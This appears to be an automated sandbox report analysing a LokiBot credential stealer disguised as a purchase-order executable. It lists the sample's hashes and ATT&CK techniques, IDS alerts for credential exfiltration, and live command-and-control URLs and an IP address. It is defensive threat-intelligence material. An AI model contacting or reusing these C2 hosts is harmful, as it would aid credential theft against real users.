                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword2_2_0040D069
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword2_2_0040D069
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      11
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                      Process Injection
                      1
                      Disable or Modify Tools
                      2
                      Credentials in Registry
                      31
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      31
                      Virtualization/Sandbox Evasion
                      Security Account Manager1
                      File and Directory Discovery
                      SMB/Windows Admin Shares2
                      Data from Local System
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Access Token Manipulation
                      NTDS13
                      System Information Discovery
                      Distributed Component Object ModelInput Capture113
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                      Process Injection
                      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Deobfuscate/Decode Files or Information
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      rPedidodecompra__PO20441__ARIMComponentes.exe100%AviraHEUR/AGEN.1323787
                      rPedidodecompra__PO20441__ARIMComponentes.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dddotx.shop
                      188.114.96.3
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://dddotx.shop/Mine/PWS/fre.phptrue
                          unknown
                          http://kbfvzoboss.bid/alien/fre.phptrue
                            unknown
                            http://alphastand.win/alien/fre.phptrue
                              unknown
                              http://alphastand.trade/alien/fre.phptrue
                                unknown
                                http://alphastand.top/alien/fre.phptrue
                                  unknown
                                  http://dddotx.shop/Mine/PWS/fre.phptrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      188.114.96.3
                                      dddotx.shopEuropean Union
                                      13335CLOUDFLARENETUStrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1541288
                                      Start date and time:2024-10-24 17:01:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 52s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:5
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:rPedidodecompra__PO20441__ARIMComponentes.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 84
                                      • Number of non-executed functions: 5
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: rPedidodecompra__PO20441__ARIMComponentes.exe
                                      TimeTypeDescription
                                      11:02:09API Interceptor69x Sleep call for process: aspnet_compiler.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.114.96.3Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • paste.ee/d/nwtkd
                                      Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                      • www.launchdreamidea.xyz/bd77/
                                      PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                      • www.timizoasisey.shop/3p0l/
                                      BL.exeGet hashmaliciousFormBookBrowse
                                      • www.launchdreamidea.xyz/bd77/
                                      w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 733812cm.n9shteam.in/DefaultWordpress.php
                                      9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 733812cm.n9shteam.in/DefaultWordpress.php
                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                      • servicetelemetryserver.shop/api/index.php
                                      t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                      aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                      • main.dsn.ovh/dns/lovely
                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                      • filetransfer.io/data-package/DyuQ5y15/download
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      dddotx.shop1e#U0414.exeGet hashmaliciousLokibotBrowse
                                      • 188.114.96.3
                                      (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                      • 188.114.97.3
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttp://url960.aceeduconsult.com/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0LMpnaTL-2BzYU1WV-2BSTu4-2FYE-3DnWBx_C2kZwAnfGwUSqF5D87NbxLVpuF-2FUu77KiRgkAhE5NE4LxNdD8Vk-2BBXjUuKxXLIa0fIDZmJqQTdTMUWaKg74qY7H1042trEdUOL1Ty-2B4ikz6aamPgX0YPKifSgbmdnoJ9QNdI7-2Fj5HU9YtlUVfM2hhaIRlcN5LDyRrfABDYCmE6HCezIFJke-2Bw8MgqKR8oZe3x0bNQ5ip4gqKVt9OZvtTXtI2W19VoVZDzbdeDK4WD-2F3HaEv25gNxrltbLRhf8V-2BO7eWR3mjaJT30K-2BcVCwIlJZO7lziFom1TeAFneOePh2rvH67eyoHyRuDs7uhJ58UvSbL-2F5WGOZFqHf1Uoqm5u1BuusL-2F4yIoUS3Zge-2Bhwb2SPTTZrQp-2B3YQW62QJEBscu8XAGBtmCTNO-2FGrj9S-2BwtsmLluvkoUx0cXtIZxgyjwWcDifMxEpsoupBhIu0vHgSwbA5Jlj-2FdPy-2B0yhvKMBxhOgsBuXNzAVSfF8HuZvD5iWXinRKWqhNg1QpvfMK5Why8PnI5FwIsgrY7RxMkEbcDdf0VL1a7dM3RDh9LkpekDjtHu-2F4c-2FsI73UIfVUG4-2BbcH5VEOHzkCenTbIl-2BeYnL2jw9k-2Bt-2BAEZMQZavCq5q7Io2kchrzK3tu9Vj43TTv0K790k8tA4okR0vSuH0WvhSIZBs2e3uKgx9FK2SAr5JJzheB6cW2OXdbGgfDGPwGYkvJqNCBixLi9dWacb8fBed5RjA3p1JUsS79RbxF-2FaSjDqEr3OTeFx3WgBthSzcSYPpiE9ha00gB-2FAVdpFU8eOGGhrdGc6OgU4OZhDsRkN5FNMpRj3pgHOHQ6dkJW4RJx1-2B1Om8bljV3ruWQytV5mwg68-2FvnkkpkZM63omm27kalKxw-3DGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousHTMLPhisherBrowse
                                      • 104.26.0.222
                                      https://lnk.ie/73BGS/e=?utm_campaign=&utm_medium=email&utm_source=eloqua&utm_content=EMS&elqTrackId=b3e6296b7e034428ab6cf8165586e5f3&elq=f15d0983a3e2469a9348a180a5d34fca&elqaid=2922&elqat=1&elqCampaignId=1792&elqak=8AF50EC23DDB3CA8DB8B1F52080496E6D8BDFEE307A00555CA936F9692C081A369A3Get hashmaliciousUnknownBrowse
                                      • 104.18.95.41
                                      Payment for outstanding statements.pdfGet hashmaliciousHTMLPhisherBrowse
                                      • 172.64.151.101
                                      https://t.ly/8LgfkGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                      • 172.67.177.220
                                      ATT25322.htmlGet hashmaliciousUnknownBrowse
                                      • 162.247.243.29
                                      https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                      • 172.67.68.47
                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                      • 188.114.96.3
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):226
                                      Entropy (8bit):5.360398796477698
                                      Encrypted:false
                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                      MD5:3A8957C6382192B71471BD14359D0B12
                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):47
                                      Entropy (8bit):1.168829563685559
                                      Encrypted:false
                                      SSDEEP:3:/lSll2DQi:AoMi
                                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:........................................user.
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.803665996976218
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:rPedidodecompra__PO20441__ARIMComponentes.exe
                                      File size:474'112 bytes
                                      MD5:13a22d03a02d5ba40e7865b1595db7a2
                                      SHA1:93fabdf07e6ed1c0316ebb5db63b28e041586e46
                                      SHA256:088bb7500d35c7ab73827301e505660559437479ef46312c3ee08b6253f35953
                                      SHA512:3b7c6f7d38eab796f043c8545ff1bf870e24d7f145df5593ab572bde1f423a242165314e4ec93ca69c13b41ffe86d2d6ee76d633ef9fc98f21f16eb868368d1d
                                      SSDEEP:6144:G9BrS6At7sb8op6Jncp3PIRQBVgbFgLIklqKgZ3zWOlCV3LG50vVzVpTT:kM4QoRpB+bGfjclCV3Li09zDT
                                      TLSH:28A4AE5CF7428A70C428157198E6882003657F7694B3DB7E3D8C73FA1BB339B584AE5A
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$.g..............0......*......./... ...@....@.. ....................................`................................
                                      Icon Hash:460626073cc14907
                                      Entrypoint:0x442fce
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671A24C4 [Thu Oct 24 10:43:16 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x42f800x4b.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x32650.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x42f340x1c.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x40fd40x410000408dbb46af3ebda48ce01d6ba5a72b9False0.7687762920673077data7.375405459723751IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x440000x326500x328006fd4f1f034dab368dd7dc90fc12aeb8eFalse0.46935914294554454data5.71284829084004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x780000xc0x200cdeaef632e7d8ad422207683f829951eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x442b00xa5d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.994982332155477
                                      RT_ICON0x4e8840x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.25560451910564297
                                      RT_ICON0x5f0ac0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.35642211477822155
                                      RT_ICON0x685540x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.4021256931608133
                                      RT_ICON0x6d9dc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.37299244213509686
                                      RT_ICON0x71c040x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.4450207468879668
                                      RT_ICON0x741ac0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5103189493433395
                                      RT_ICON0x752540x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5778688524590164
                                      RT_ICON0x75bdc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6400709219858156
                                      RT_GROUP_ICON0x760440x84data0.7272727272727273
                                      RT_VERSION0x760c80x39cdata0.42857142857142855
                                      RT_MANIFEST0x764640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-24T17:01:59.827885+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549845TCP
                                      2024-10-24T17:01:59.827885+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549826TCP
                                      2024-10-24T17:02:06.733299+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549704188.114.96.380TCP
                                      2024-10-24T17:02:06.733299+02002025381ET MALWARE LokiBot Checkin1192.168.2.549704188.114.96.380TCP
                                      2024-10-24T17:02:06.733299+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549704188.114.96.380TCP
                                      2024-10-24T17:02:07.687491+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549704188.114.96.380TCP
                                      2024-10-24T17:02:07.830536+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549705188.114.96.380TCP
                                      2024-10-24T17:02:07.830536+02002025381ET MALWARE LokiBot Checkin1192.168.2.549705188.114.96.380TCP
                                      2024-10-24T17:02:07.830536+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549705188.114.96.380TCP
                                      2024-10-24T17:02:08.867503+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549705188.114.96.380TCP
                                      2024-10-24T17:02:08.934078+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549706188.114.96.380TCP
                                      2024-10-24T17:02:08.934078+02002025381ET MALWARE LokiBot Checkin1192.168.2.549706188.114.96.380TCP
                                      2024-10-24T17:02:08.934078+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549706188.114.96.380TCP
                                      2024-10-24T17:02:10.024741+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549706188.114.96.380TCP
                                      2024-10-24T17:02:10.024741+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549706188.114.96.380TCP
                                      2024-10-24T17:02:10.030314+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549706TCP
                                      2024-10-24T17:02:10.185322+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549707188.114.96.380TCP
                                      2024-10-24T17:02:10.185322+02002025381ET MALWARE LokiBot Checkin1192.168.2.549707188.114.96.380TCP
                                      2024-10-24T17:02:10.185322+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549707188.114.96.380TCP
                                      2024-10-24T17:02:11.080802+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549707188.114.96.380TCP
                                      2024-10-24T17:02:11.080802+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549707188.114.96.380TCP
                                      2024-10-24T17:02:11.088434+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549707TCP
                                      2024-10-24T17:02:11.235526+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549708188.114.96.380TCP
                                      2024-10-24T17:02:11.235526+02002025381ET MALWARE LokiBot Checkin1192.168.2.549708188.114.96.380TCP
                                      2024-10-24T17:02:11.235526+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549708188.114.96.380TCP
                                      2024-10-24T17:02:12.208821+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549708188.114.96.380TCP
                                      2024-10-24T17:02:12.208821+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549708188.114.96.380TCP
                                      2024-10-24T17:02:12.214201+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549708TCP
                                      2024-10-24T17:02:12.361135+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549709188.114.96.380TCP
                                      2024-10-24T17:02:12.361135+02002025381ET MALWARE LokiBot Checkin1192.168.2.549709188.114.96.380TCP
                                      2024-10-24T17:02:12.361135+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549709188.114.96.380TCP
                                      2024-10-24T17:02:13.387417+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549709188.114.96.380TCP
                                      2024-10-24T17:02:13.387417+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549709188.114.96.380TCP
                                      2024-10-24T17:02:13.394166+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549709TCP
                                      2024-10-24T17:02:13.549321+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549710188.114.96.380TCP
                                      2024-10-24T17:02:13.549321+02002025381ET MALWARE LokiBot Checkin1192.168.2.549710188.114.96.380TCP
                                      2024-10-24T17:02:13.549321+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549710188.114.96.380TCP
                                      2024-10-24T17:02:16.923354+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549710188.114.96.380TCP
                                      2024-10-24T17:02:16.923354+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549710188.114.96.380TCP
                                      2024-10-24T17:02:16.928848+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549710TCP
                                      2024-10-24T17:02:17.079419+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549717188.114.96.380TCP
                                      2024-10-24T17:02:17.079419+02002025381ET MALWARE LokiBot Checkin1192.168.2.549717188.114.96.380TCP
                                      2024-10-24T17:02:17.079419+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549717188.114.96.380TCP
                                      2024-10-24T17:02:20.447398+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549717188.114.96.380TCP
